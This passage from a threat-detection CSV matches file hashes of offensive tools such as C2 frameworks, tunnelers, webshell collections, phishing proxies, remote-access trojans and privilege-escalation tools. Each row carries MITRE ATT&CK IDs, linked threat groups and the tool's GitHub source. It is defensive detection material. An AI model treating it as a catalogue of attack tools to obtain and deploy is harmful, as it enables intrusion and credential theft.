TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","23331" "*242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb*",".{0,1000}242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23333" "*242e41d85fab89e16209aaac8fe816788ec9e9bfb032a03aeaf1419c4e10c186*",".{0,1000}242e41d85fab89e16209aaac8fe816788ec9e9bfb032a03aeaf1419c4e10c186.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23334" "*242edf5f22175e7bb921568de525cd1469c3462fbb5943a04f2cc681cff764f4*",".{0,1000}242edf5f22175e7bb921568de525cd1469c3462fbb5943a04f2cc681cff764f4.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - 
T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23335" "*2437b5db59dd1b987232c3f0b4ed53408bce886e98e879887d3a1c52ee93e141*",".{0,1000}2437b5db59dd1b987232c3f0b4ed53408bce886e98e879887d3a1c52ee93e141.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","23338" "*2438d7f90c0d3cef5082dc9072249c2965d6bbd5caf777cc00b09c18d29edcdb*",".{0,1000}2438d7f90c0d3cef5082dc9072249c2965d6bbd5caf777cc00b09c18d29edcdb.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - 
T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23339" "*2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244*",".{0,1000}2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23341" "*2448bea950b409f78ec4ef893351cb860d45dde31736bb771f34adaa44e6344f*",".{0,1000}2448bea950b409f78ec4ef893351cb860d45dde31736bb771f34adaa44e6344f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23342" "*245f1d201e526f91b4950e1c23328f2ac2b22d6da4d6c56aa63e3b512d980991*",".{0,1000}245f1d201e526f91b4950e1c23328f2ac2b22d6da4d6c56aa63e3b512d980991.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23344" "*24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b*",".{0,1000}24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23346" "*24690dc55d197a7a63bc2a80404a6e662c719e04bff38435796c666d1cfcb719*",".{0,1000}24690dc55d197a7a63bc2a80404a6e662c719e04bff38435796c666d1cfcb719.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","23347" "*24722c45c461dfbcd1e5c9d2cba90bbc6fb32d2bff58b8fbbfb18a852f7eebde*",".{0,1000}24722c45c461dfbcd1e5c9d2cba90bbc6fb32d2bff58b8fbbfb18a852f7eebde.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","23348" "*2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8*",".{0,1000}2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23349" 
"*247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d*",".{0,1000}247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23351" "*247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278*",".{0,1000}247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23352" "*2481d8ac474510659f30763ac99dd577b78285594f0ba281f08d83829ec56225*",".{0,1000}2481d8ac474510659f30763ac99dd577b78285594f0ba281f08d83829ec56225.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23353" 
"*24882318e38e1e5778b7852196e754ead1af9de537ffd1dd3132467076dbda38*",".{0,1000}24882318e38e1e5778b7852196e754ead1af9de537ffd1dd3132467076dbda38.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","23354" "*24a9917b1d657d5961df9c2e712e1528ae4c6e73541529bbf2aee3f360724c2e*",".{0,1000}24a9917b1d657d5961df9c2e712e1528ae4c6e73541529bbf2aee3f360724c2e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23357" "*24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50*",".{0,1000}24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","23358" "*24ae403a4b2844b646f6520b7eb7c6817f739759afca42b66c250424c46bc89a*",".{0,1000}24ae403a4b2844b646f6520b7eb7c6817f739759afca42b66c250424c46bc89a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23359" 
"*24b25698a2b1e5035978642fdd0fb07dc44018e58723a4a674ff7e6c2bd3163e*",".{0,1000}24b25698a2b1e5035978642fdd0fb07dc44018e58723a4a674ff7e6c2bd3163e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23361" "*24b3c82f54df63a856f237eab7bb1f7d85cbe83bc9a9f2c77df1d6abbe03268c*",".{0,1000}24b3c82f54df63a856f237eab7bb1f7d85cbe83bc9a9f2c77df1d6abbe03268c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23362" "*24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c*",".{0,1000}24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","23363" "*24b6f5f69fbc819dcfbdaa0efcfbf5a71f26f651e5c2310ebe495b193f89cce9*",".{0,1000}24b6f5f69fbc819dcfbdaa0efcfbf5a71f26f651e5c2310ebe495b193f89cce9.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - 
T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23364" "*24b7191a8f1c5a64ef880f979ebcf6b2957278ecce023743714acddb4d9c1ebc*",".{0,1000}24b7191a8f1c5a64ef880f979ebcf6b2957278ecce023743714acddb4d9c1ebc.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23365" "*24bf6c85aacb6285b8f89f74b59ae1390c767bb9de880afdff3047117bc9d18d*",".{0,1000}24bf6c85aacb6285b8f89f74b59ae1390c767bb9de880afdff3047117bc9d18d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced 
tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23367" "*24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7*",".{0,1000}24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","23369" "*24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f*",".{0,1000}24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","23372" "*24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f*",".{0,1000}24d7bda466850d93fc1883a3937e1317fbb3f9e631ab0d2a4fa0b45c2c21c24f.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","0","#filehash","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","23373" "*24d861124682031773ac0f6df9e5011b18a8d925c8c22469330826e64ccc2bab*",".{0,1000}24d861124682031773ac0f6df9e5011b18a8d925c8c22469330826e64ccc2bab.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable 
files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#filehash #linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","23375" "*24e3451e7466a3c1bb84250a85fdd4b004856c8087458119ccfe1631877f5e3b*",".{0,1000}24e3451e7466a3c1bb84250a85fdd4b004856c8087458119ccfe1631877f5e3b.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","23376" "*24e84edaff898e6eacc5143afd258731fd8a8f31146ebb829b36b35a44cb1d94*",".{0,1000}24e84edaff898e6eacc5143afd258731fd8a8f31146ebb829b36b35a44cb1d94.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23377" "*24eff9f3b53d50488cf9260a59dfa59afac34b67d6dba4d156127b9a72713088*",".{0,1000}24eff9f3b53d50488cf9260a59dfa59afac34b67d6dba4d156127b9a72713088.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23379" "*24f4f092e673651bbd2ddc5a97f8da0cb9d2bbe49db773c691ca5f4251f4d871*",".{0,1000}24f4f092e673651bbd2ddc5a97f8da0cb9d2bbe49db773c691ca5f4251f4d871.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23380" "*24f608e725ca4ca008b780bde8be2d27bfd9a1b4c9b4a106d4f679e75a21d2f2*",".{0,1000}24f608e725ca4ca008b780bde8be2d27bfd9a1b4c9b4a106d4f679e75a21d2f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23381" 
"*24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3*",".{0,1000}24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","23384" "*24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3*",".{0,1000}24fe09ac811357d1a5ddd63652604def847cb2d4f81c01ecfe563ead611783e3.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","23385" "*2504c2d20454d5caf5a0e24b497a3913c3289042b7fdf6bc336a25430085bc98*",".{0,1000}2504c2d20454d5caf5a0e24b497a3913c3289042b7fdf6bc336a25430085bc98.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23387" "*2507ccefca7ad5cc4247bae065b0fefb7c3b16cf2d1190535473a05f213d5004*",".{0,1000}2507ccefca7ad5cc4247bae065b0fefb7c3b16cf2d1190535473a05f213d5004.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23388" "*250abcb0da278460620cef30b9ab1c401b0e57a53642e5f6b357b9ca6b4fbfdc*",".{0,1000}250abcb0da278460620cef30b9ab1c401b0e57a53642e5f6b357b9ca6b4fbfdc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23389" 
"*25110aab44570c065061044d38afc50eea45ca5f78bb2b70b0941d63c979cf62*",".{0,1000}25110aab44570c065061044d38afc50eea45ca5f78bb2b70b0941d63c979cf62.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23390" "*25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc*",".{0,1000}25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","23391" "*25151ae98c5657bd40a5318e86c8b341bf7a59d7e04b6b4658e644e6e6c42687*",".{0,1000}25151ae98c5657bd40a5318e86c8b341bf7a59d7e04b6b4658e644e6e6c42687.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23392" "*2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef*",".{0,1000}2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23393" "*252320367dfa2dd13f2da44521a0311d1591a952e81b7997c33f4ead02cff736*",".{0,1000}252320367dfa2dd13f2da44521a0311d1591a952e81b7997c33f4ead02cff736.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 